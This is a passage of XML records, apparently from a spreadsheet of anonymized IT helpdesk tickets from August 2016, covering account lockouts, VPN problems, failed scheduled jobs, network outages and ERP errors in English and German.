    <s v="ticket update on ticket_no0432827"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to skype"/>
    <s v="cleared skype cache files "/>
    <s v="ybplwrez lqcyehbf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unknown request for guest wireless access"/>
    <s v="hello,_x000d__x000a_i had never used the guest wireless access system before. today when i entered, i saw an entry in pending accounts which i'm not familiar with (please check the attached screenshot). can this be a security threat? can you please investigate?_x000d__x000a_"/>
    <s v="yabnljgs cjlgetqz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="fi/co issue - sto 5019143086 "/>
    <s v="please review sto 5019143086 .  user is receiving the error message below to &quot;please enter net price&quot;.  there is no average customer net price for this material (vk13 - ztfn), so erp should be simulating a transfer price for the material but it does not appear to be doing so.  _x000d__x000a__x000d__x000a_ _x000d__x000a_sender reciever material created quantity  requsted quantity  sto number error code_x000d__x000a_plant_105 plant_101 2355391                  3            please enter net price_x000d__x000a_"/>
    <s v="wgothrzl iokdftgn"/>
    <x v="29"/>
  </r>
  <r>
    <s v="install engineering_tool"/>
    <s v="install engineering_tool"/>
    <s v="jvpkulxw ovuweygj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="der netweaver business client 5.0 kann nicht gestartet werden."/>
    <s v="der netweaver business client 5.0 kann nicht gestartet werden."/>
    <s v="ejcylstw gdvzkihe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="EU_tool -&gt; sinterleitstand (sls) -&gt; beilageproben -&gt; auswerten, form &quot;beilage und tms proben&quot;, input of ald2 and ald3 data"/>
    <s v="currently it is impossible to enter data of cycles of the following the furnaces: ald2 and ald3_x000d__x000a__x000d__x000a_same as  - ticket_no0414688"/>
    <s v="howfanzi siavgtby"/>
    <x v="25"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="jhunextz zorxpwkt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account getting locked on windows "/>
    <s v="account getting locked on windows "/>
    <s v="ybplwrez lqcyehbf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="supply_chain_software password reset"/>
    <s v="supply_chain_software password reset"/>
    <s v="mtukbcow xfdtukjm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lunch rm computer down"/>
    <s v="the employee computer in mfg #1 lunch rm. is down"/>
    <s v="pbrmgyzo hzoxdijn"/>
    <x v="2"/>
  </r>
  <r>
    <s v="delivery notes - unable to inwarehouse_tool four deliveries.  error indicates a block. no block on orders"/>
    <s v="deliveries mentioned below are not invoicing.   try to do it manual under vf01.  errors were:   the billing type could not be determined, block for billing, the item is not relevant for billing.  _x000d__x000a_9168911759_x000d__x000a_8057800533_x000d__x000a_9168911663_x000d__x000a_8057800653_x000d__x000a_9168911772_x000d__x000a_8057800687_x000d__x000a_9165515998_x000d__x000a__x000d__x000a_need resolved before month end.     any questions please contact ibtvlfah dtlwscma 479-633-6608"/>
    <s v="ibtvlfah dtlwscma"/>
    <x v="12"/>
  </r>
  <r>
    <s v="HostName_108 (plm conversion server - kirty):  alwaysupservice.exe process count service is down "/>
    <s v="HostName_108 (plm conversion server - kirty):  alwaysupservice.exe process count service is down "/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="13"/>
  </r>
  <r>
    <s v="unable to access n drive "/>
    <s v="unable to access n drive "/>
    <s v="yqshfmvi jwyrmlbz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 08/24/2016 08:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 08/24/2016 08:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="background jobs in erp inbox will not export into excell after gui upgrade"/>
    <s v="sa38 reports that are scheduled to run as a background job, show up in the erp inbox.  they allow you to open them and show the data is transmitted.  however, excell hangs up and no data shows.   this did not occur until the upgrade occurred.  i have already logged totally out of erp and logged in again to see if that correct the situation with no success"/>
    <s v="hzpmalgo xpvugeyr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="attendance_tool intouch clocks - shows as down in application"/>
    <s v="attendance_tool intouch clocks - shows as down in application"/>
    <s v="noscwdpm akiowsmp"/>
    <x v="3"/>
  </r>
  <r>
    <s v="keine verbindung zum server"/>
    <s v="keine verbindung zum server, kein zugriff auf laufwerke in germany"/>
    <s v="wyotidgu nydzrtuw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="laptop crash"/>
    <s v="laptop crash"/>
    <s v="pqizlhkx adbyhglu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="Israel, israel - (company):company-eu-isr--mainswitch-b-3560-access-sw02 is down since at 08:11 am et on  08/24"/>
    <s v="EMEA, israel - (company):company-eu-isr--mainswitch-b-3560-access-sw02 is down since at 08:11 am et on 08/24"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="7"/>
  </r>
  <r>
    <s v="server for public folder in germany is not available"/>
    <s v="\\HostName_598\public is not available._x000d__x000a_is there are new server name for germany or just an network issue?_x000d__x000a_when could this be solved?"/>
    <s v="skocrqdw pexcdfao"/>
    <x v="0"/>
  </r>
  <r>
    <s v="tengigabitethernet1/5 Â· connection to tech-4500x (a) - (10.1.200.2) is down on top-6509-msfc720."/>
    <s v="tengigabitethernet1/5 Â· connection to tech-4500x (a) - (10.1.200.2) is down on top-6509-msfc720."/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="3"/>
  </r>
  <r>
    <s v="completed order 32079269 form 2014 for vw is visible on md04, mm 3967345"/>
    <s v="hello,_x000d__x000a_there is completed order 32079269 form 2014 for vw visible on md04, mm 4078456, please see attachments."/>
    <s v="vgmbxkji jukplihz"/>
    <x v="5"/>
  </r>
  <r>
    <s v="audio not working laptop - error no device installed error"/>
    <s v="computer name  : agvl8325581_x000a__x000a_service tag :  j6gqbt1_x000a__x000a_phone: 05450"/>
    <s v="oirxvhbp zltpgvbk"/>
    <x v="32"/>
  </r>
  <r>
    <s v="collaboration_platform is not openning."/>
    <s v="collaboration_platform is not openning."/>
    <s v="fmorwhip jidvlbtp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="folder access"/>
    <s v="_x000a__x000a_received from: qhvspezr.fvluqczd@gmail.com_x000a__x000a_hi_x000a__x000a_please get tghrloks jbgcvlmf tghrloks.jbgcvlmf@gmail.com&lt;mailto:tghrloks.jbgcvlmf@gmail.com&gt; ( user id : nuerthytzg ) access to below folder location ._x000a__x000a_\\HostName_95\teams\globalengservices\9tcb_nc\&lt;file:///\\HostName_95\teams\globalengservices\9tcb_nc\&gt;_x000a__x000a_with warm "/>
    <s v="qhvspezr fvluqczd"/>
    <x v="11"/>
  </r>
  <r>
    <s v="reparo pdf creator"/>
    <s v="favor reparar o pdf creator, quando vou imprimir o recibo da gia sp em pdf estÃ¡ saindo somente caracteres."/>
    <s v="frjpkuwq rtznexbq"/>
    <x v="62"/>
  </r>
  <r>
    <s v="top urgent request les team: change back kis inwarehouse_tool sender address of  sales orgr 1278 from germany to fÃ¼rth"/>
    <s v="subject: wrong address on kis inwarehouse_tools for salsed org 1278_x000d__x000a_importance: high_x000d__x000a__x000d__x000a_kis commercial inwarehouse_tools for sales org 1278 print wrong sender address, which cause legal compliance error with german customs.  _x000d__x000a_revers 1278  sales org address to company infrastruture gmbh, wehlauerstr. 73,  90766 germany  today!!!_x000d__x000a__x000d__x000a_please confrim estimated time of change  in SID_34 system aspap. _x000d__x000a_"/>
    <s v="qgopxabz xnuieqjr"/>
    <x v="12"/>
  </r>
  <r>
    <s v="job SID_41arc2 failed in job_scheduler at: 08/24/2016 07:04:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_41arc2 failed in job_scheduler at: 08/24/2016 07:04:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_41arc2 failed in job_scheduler at: 08/24/2016 07:04:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_41arc2 failed in job_scheduler at: 08/24/2016 07:04:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="not able to save files on HostName_776"/>
    <s v="not able to save files on HostName_776. there were reporting reports to be saved."/>
    <s v="yolktfas fyoxqgvh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_26arc2 failed in job_scheduler at: 08/24/2016 06:58:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_26arc2 failed in job_scheduler at: 08/24/2016 06:58:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1953a failed in job_scheduler at: 08/24/2016 06:52:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1953a failed in job_scheduler at: 08/24/2016 06:52:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="vpn not accepting password"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vfoyenlw.ntpbdeyf@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am unable to login vpn._x000d__x000a_it's showing user name and password not matching. it is not accepting my current password._x000d__x000a__x000d__x000a_i checked the password and it is okay._x000d__x000a__x000d__x000a_please help me to resolve the issue._x000d__x000a__x000d__x000a_with "/>
    <s v="vfoyenlw ntpbdeyf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1953a failed in job_scheduler at: 08/24/2016 06:52:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1953a failed in job_scheduler at: 08/24/2016 06:52:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_714 failed in job_scheduler at: 08/24/2016 06:53:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_714 failed in job_scheduler at: 08/24/2016 06:53:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="HostName_521: alwaysupservice.exe: wrong number of instances of process alwaysupservice.exe, "/>
    <s v="HostName_521: alwaysupservice.exe: wrong number of instances of process alwaysupservice.exe, expected instances gte 5 but found 4"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job SID_44arc2 failed in job_scheduler at: 08/24/2016 06:31:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_44arc2 failed in job_scheduler at: 08/24/2016 06:31:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_35arc2 failed in job_scheduler at: 08/24/2016 06:22:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_35arc2 failed in job_scheduler at: 08/24/2016 06:22:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="cert notification - network outage at germany (formerly germany)"/>
    <s v="what is the issue? unplanned network outage at germany site (formerly germany) - all network resources including telephony_software services, and the phone number for gso emea () are unavailable at the moment. a fiber cut in the vicinity of the site has caused the issue. german telekom has been contacted after the fault was identified, and services are expected to be restored at 7:30 am edt._x000a__x000a_when did it start? 24 august 2016, 3:30 am edt_x000a__x000a_what is the estimated time to recovery?  unknown at this time._x000a__x000a_who and what are affected?  all intranet and internet resources including telephone services at the site are affected_x000a__x000a_are there any known workarounds?  no workarounds available at the moment._x000a__x000a_what is the cause?  suspected fiber cut_x000a__x000a_questions? global service organization_x000a__x000a_a leadership bridge line has been established in order to provide more timely updates to you.  this line is open to all business unit representatives, as well as, it management._x000a__x000a_leadership bridge line will be open at 6:55 am edt_x000a__x000a__x000a_leadership bridge line_x000a_"/>
    <s v="ayrhcfxi zartupsw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3049 failed in job_scheduler at: 08/24/2016 06:17:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3049 failed in job_scheduler at: 08/24/2016 06:17:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_23arc2 failed in job_scheduler at: 08/24/2016 06:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_23arc2 failed in job_scheduler at: 08/24/2016 06:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_31arc2 failed in job_scheduler at: 08/24/2016 06:09:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_31arc2 failed in job_scheduler at: 08/24/2016 06:09:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_31arc2 failed in job_scheduler at: 08/24/2016 06:09:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_31arc2 failed in job_scheduler at: 08/24/2016 06:09:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="no access to bobs"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ufebvyzx.gzahomlv@gmail.com_x000d__x000a__x000d__x000a_hello , i have no accesss to bobj_x000d__x000a__x000d__x000a_need help_x000d__x000a__x000d__x000a_"/>
    <s v="ufebvyzx gzahomlv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="interface fastethernet0/27-vlan 51-lhqwx402189sf on company-na-usa-usa-switch-cl04-3-2960-access-sw03 is down"/>
    <s v="interface fastethernet0/27-vlan 51-lhqwx402189sf on company-na-usa-usa-switch-cl04-3-2960-access-sw03 is down"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="zugriff auf netzlaufwerke"/>
    <s v="_x000d__x000a__x000d__x000a_received from: sthqwdpj.lpnigfyq@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_seit dem ich mein passwort geÃ¤ndert habe, habe ich keinen zugriff auf die netzlaufwerke._x000d__x000a_vpn funktioniert glaube ich nicht richtig._x000d__x000a__x000d__x000a_danke fÃ¼r ihre unterstÃ¼tzung._x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen |  best "/>
    <s v="sthqwdpj lpnigfyq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="login error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nbdljruw.axcrspyh@gmail.com_x000d__x000a__x000d__x000a_hallo zusammen,_x000d__x000a__x000d__x000a_beim einloggen mit dem password_management_tool password manager, wurde mir das konto erneut gesperrt._x000d__x000a_bitte erneut freischalten &amp; ein gÃ¼ltiges password zur anmeldung._x000d__x000a_mir war nicht klar welches password ich verwenden soll._x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="nbdljruw axcrspyh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update - inplant_852115"/>
    <s v="ic_x000d__x000a_ welcome, our next available agent will be with you shortly..._x000d__x000a_ interaction alerting agent._x000d__x000a_ website visitor has joined the conversation_x000d__x000a_zheqafyo bqirpxag_x000d__x000a_ hi_x000d__x000a_ayrhcfxi zartupsw_x000d__x000a_ hello paneer_x000d__x000a_ "/>
    <s v="ayrhcfxi zartupsw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="we need to change the title for cuibfgna cbmqufoa in outlook to production manager, can you do this ? "/>
    <s v="we need to change the title for cuibfgna cbmqufoa in outlook to production manager, can you do this ? "/>
    <s v="nwhurdte bldifgck"/>
    <x v="19"/>
  </r>
  <r>
    <s v="distributor_tool Ã¼berblick / schulung"/>
    <s v="hallo_x000d__x000a_danke fÃ¼r ihre antwort._x000d__x000a_ich habe gerade versucht aber es funktioniert nicht._x000d__x000a_ich habe versucht mit demselben benutz-namen und password das ich fÃ¼r SID_34 benutz._x000d__x000a_ich habe auch mit password daypay3 versucht, wie hbmwlprq ilfvyodx vorgeschlafen hat._x000d__x000a_welches passwort sollte ich benutzen?_x000d__x000a__x000d__x000a__x000d__x000a_distinti saluti / mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="elivbznp tynvpcfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issue with attendance_tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bajrpckl.cevtiuob@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_   i am not able to login into attendance_tool website and also it is not available on the hub for me._x000d__x000a__x000d__x000a_"/>
    <s v="bajrpckl cevtiuob"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" material in q for complaints shipped to dfrt going into normal bin"/>
    <s v="we are having an issue with materials from complaints coming from other locations to plant_105._x000d__x000a_very often â€“ they are in q, but go to a normal bin.  as the q is not printed on the transfer order_x000d__x000a_the receivers place them into our normal bin locations.._x000d__x000a_ _x000d__x000a_examples are delivery 9168844172 for complaint 7611181872_x000d__x000a_ _x000d__x000a_could you pls. check why the material does not go to a q bin location automatically? _x000d__x000a_ _x000d__x000a_pls. assign to les team "/>
    <s v="vwpxjtof vmidzswj"/>
    <x v="17"/>
  </r>
  <r>
    <s v="exel file is not openning as the default programdntym to open with is changed."/>
    <s v="exel file is not openning as the default programdntym to open with is changed."/>
    <s v="gmneclxj czqthmrs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="installing cutview "/>
    <s v="installing cutview "/>
    <s v="sgqthwuf cyahpdfu"/>
    <x v="66"/>
  </r>
  <r>
    <s v="probleme mit vpn  stÃ¶hrmann \niptbwdq csenjruz"/>
    <s v="probleme mit vpn  stÃ¶hrmann \niptbwdq csenjruz"/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="add user nuksytoh whovmtez (sbcheyu) to ad group eagcutview"/>
    <s v="add user nuksytoh whovmtez (sbcheyu) to ad group eagcutview"/>
    <s v="skocrqdw pexcdfao"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no email synchro after windows 10 update on my lumia 950"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bmudkpie.qolrvbip@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_yesterday i installed the new windows 10 update on my lumia 950 and now the emails are not synchronized._x000d__x000a__x000d__x000a_will be available in the afternoon, just in case you need me._x000d__x000a__x000d__x000a_best "/>
    <s v="bmudkpie qolrvbip"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit schichtplanung \xpugntjv zcaermdt"/>
    <s v="probleme mit schichtplanung \xpugntjv zcaermdt"/>
    <s v="xpugntjv zcaermdt"/>
    <x v="24"/>
  </r>
  <r>
    <s v="sales order 35944817: committed date = sunday"/>
    <s v="hello it,_x000d__x000a__x000d__x000a_please check, why the system allows a sundaycommitted date._x000d__x000a__x000d__x000a_"/>
    <s v="jwqyxbzs adpvilqu"/>
    <x v="12"/>
  </r>
  <r>
    <s v="your company guest account credentials"/>
    <s v="wie kann ich die gÃ¤ste freischalten ?_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen i kind "/>
    <s v="gqhyzpxm ztpomxbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1388 failed in job_scheduler at: 08/24/2016 02:44:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1388 failed in job_scheduler at: 08/24/2016 02:44:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="not able to open powerpoint"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tpflxnhz.bdjiosrp@gmail.com_x000d__x000a__x000d__x000a_hi it helpdesk,_x000d__x000a__x000d__x000a_i am not able to open powerpoint slides.  when asked to repair, there is an error message after clicking on &quot;repair&quot;.  please help._x000d__x000a__x000d__x000a_[cid:image001.png@01d1fe14.3da01f40]_x000d__x000a__x000d__x000a_[cid:image002.png@01d1fe14.3da01f40]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="tpflxnhz bdjiosrp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit archiving_tool\bfqnvezs vwkasnxe"/>
    <s v="probleme mit archiving_tool\bfqnvezs vwkasnxe"/>
    <s v="bfqnvezs vwkasnxe"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit erpgui \sqlmtixr urhbvfgd"/>
    <s v="probleme mit erpgui \sqlmtixr urhbvfgd"/>
    <s v="sqlmtixr urhbvfgd"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit java \xmlbfjpg yegzbvru"/>
    <s v="probleme mit java \xmlbfjpg yegzbvru"/>
    <s v="xmlbfjpg yegzbvru"/>
    <x v="24"/>
  </r>
  <r>
    <s v="error log on vpn server"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nbdljruw.axcrspyh@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_i can not log in on vpn server. please reset my password._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="nbdljruw axcrspyh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request for access to server HostName_1036 and HostName_1039 (xkjuigsc nrzykspt and quality)"/>
    <s v="with respect to ticket_no1543729, i have received an access from security team but when i open data designer application receiving an error as attached to this incident._x000a__x000a_i have checked with mohgrtyan's rds session for dev bods and the data designer is working fine in his session. hence, request assist at an earliest as this access is required for my kt to our upcoming project._x000a__x000a_could you please help on this request?"/>
    <s v="sholvcmf bjtpomrl"/>
    <x v="19"/>
  </r>
  <r>
    <s v="ticket update on ticket_no1544198  from wqfzjycu omleknjd"/>
    <s v="ticket update on ticket_no1544198  from wqfzjycu omleknjd"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please move stock from sales order to unrestricted stock_mm# 7318995 = 40 pcs."/>
    <s v="please move stock from sales order to unrestricted stock_mm# 7318995 = 40 pcs. due to csr is not allowed to do stock movement. kindly help and advise back to us aerp., "/>
    <s v="tqfnalpj qyoscnge"/>
    <x v="5"/>
  </r>
  <r>
    <s v="messsgeraete alkoana pdf datein kann nicht gedureckt werden"/>
    <s v="messsgeraete alkoana pdf datein kann nicht gedureckt warden. pdf datei kann nicht erstellt werden."/>
    <s v="thnrqxlc yczjdxwk"/>
    <x v="41"/>
  </r>
  <r>
    <s v="account lock out ; ad"/>
    <s v="account lock out ; ad"/>
    <s v="hzetqwba tmsbnfkh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool, business_client, vpn and engineering_tool issue"/>
    <s v="engineering_tool, business_client, vpn and engineering_tool issue"/>
    <s v="jvpkulxw ovuweygj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering tool loin"/>
    <s v="engineering tool loin"/>
    <s v="jzksvdtb czvlsmqx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook is prompting for passwords again &amp; again "/>
    <s v="outlook is prompting for passwords again &amp; again "/>
    <s v="pkzthgea kgvsdmpj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need your support "/>
    <s v="_x000a__x000a_received from: ehfvwltg.eakjbtoi@gmail.com_x000a__x000a_helloï¼Œ_x000a__x000a_material noï¼š_x000a_6380772_x000a__x000a_6380773_x000a__x000a_6205289_x000a__x000a_6205222_x000a__x000a_6205223_x000a__x000a_6205282_x000a__x000a_6719653_x000a__x000a_4003367_x000a__x000a_4003579_x000a__x000a_4003535_x000a__x000a__x000a_can not use in purchasing , please help._x000a__x000a__x000a__x000a__x000a_ehfvwltg eakjbtoi_x000a_analyst supply planning_x000a_e-mail:    ehfvwltg.eakjbtoi@gmail.com&lt;mailto:ehfvwltg.eakjbtoi@gmail.com&gt;_x000a_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_x000a__x000a__x000a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a_[_x000a_select the following link to view the disclaimer in an alternate language. "/>
    <s v="ehfvwltg eakjbtoi"/>
    <x v="29"/>
  </r>
  <r>
    <s v=" wifi  for company guest  issue in apac.refer :inc1541551 "/>
    <s v="it,_x000d__x000a__x000d__x000a_please kindly help resolve this ticket again. wifi  for company guest very slowly. please advise the solution to fix it._x000d__x000a_by the way, please find attached wifi package in apac office that domestic 10 mbps, international 2 mbps. (users about 20 pax in office)_x000d__x000a_please kindly suggestion if need package change for i can check other packages with local internet provider vendor._x000d__x000a__x000d__x000a_"/>
    <s v="przndfbo pldqbhtn"/>
    <x v="3"/>
  </r>
  <r>
    <s v="received call , hold music was playing on other side and disconnected."/>
    <s v="received call , hold music was playing on other side and disconnected."/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/24/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/24/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/24/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/24/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/24/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/24/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/24/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/24/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/24/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/24/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="price error between goods receipt and po in SID_34 -urgent"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tuqrvowp.fxmzkvqo@gmail.com_x000d__x000a__x000d__x000a_dear team,_x000d__x000a__x000d__x000a_in erp SID_34 module. we have two errors between goods receipt and po for po no 5616658599\5616715766_x000d__x000a_po no_x000d__x000a__x000d__x000a_po net price_x000d__x000a__x000d__x000a_po quantity_x000d__x000a__x000d__x000a_po price_x000d__x000a__x000d__x000a_goods receipt price_x000d__x000a__x000d__x000a_5616658599_x000d__x000a__x000d__x000a_256.41_x000d__x000a__x000d__x000a_3_x000d__x000a__x000d__x000a_769.23_x000d__x000a__x000d__x000a_900_x000d__x000a__x000d__x000a_5616715766_x000d__x000a__x000d__x000a_2641.51_x000d__x000a__x000d__x000a_1_x000d__x000a__x000d__x000a_2641.51_x000d__x000a__x000d__x000a_2393.16_x000d__x000a__x000d__x000a__x000d__x000a_usually, po price and goods receipt price are the same price. but these two cases is not._x000d__x000a_please help to have a check the reason. "/>
    <s v="tuqrvowp fxmzkvqo"/>
    <x v="29"/>
  </r>
  <r>
    <s v="account locked out ; password expired"/>
    <s v="account locked out ; password expired"/>
    <s v="aguxobqs upgtdafh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no response from other side"/>
    <s v="no response from other side"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp login account is locked"/>
    <s v="requesting to unlock erp login account"/>
    <s v="wjsfbpuv lcpdfihr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/23/2016 22:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/23/2016 22:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="email address not picking up automatic "/>
    <s v="email address not picking up automatic "/>
    <s v="cvqnstgu ofnimlwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="would you please help change the email of shipping notification for customer 81956102,70213753,81583828 to 13332407521@1"/>
    <s v="from: north service _x000a_sent: wednesday, august 24, 2016 6:43 am_x000a_to: nwfodmhc exurcwkm_x000a_subject: tru : ç­”å¤: å‡ºè´§å•çš„é‚®ä»¶ä¿®æ”¹_x000a__x000a_hello help,_x000a__x000a_would you please help change the email of shipping notification for customer 81956102,70213753,81583828 to 13332407521@163.com_x000a__x000a_yandy pan_x000a_customer experience apac north team_x000a_north.service@company.com_x000a__x000a_è‚¯çº³é£žç¡•é‡‘å±žï¼ˆä¸Šæµ·ï¼‰æœ‰é™å…¬å¸_x000a_ä¸Šæµ·å¸‚æµ¦ä¸œæ–°åŒºé‡‘æ¡¥å‡ºå£åŠ å·¥åŒºé‡‘è±«è·¯750å·_x000a_é‚®ç¼–ï¼š200126_x000a_"/>
    <s v="hnpbcfsz qmvbycax"/>
    <x v="17"/>
  </r>
  <r>
    <s v="unable to login to erp SID_34"/>
    <s v="unable to login to erp SID_34"/>
    <s v="wjsfbpuv lcpdfihr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pls help to create delivery note for sto 4908029423"/>
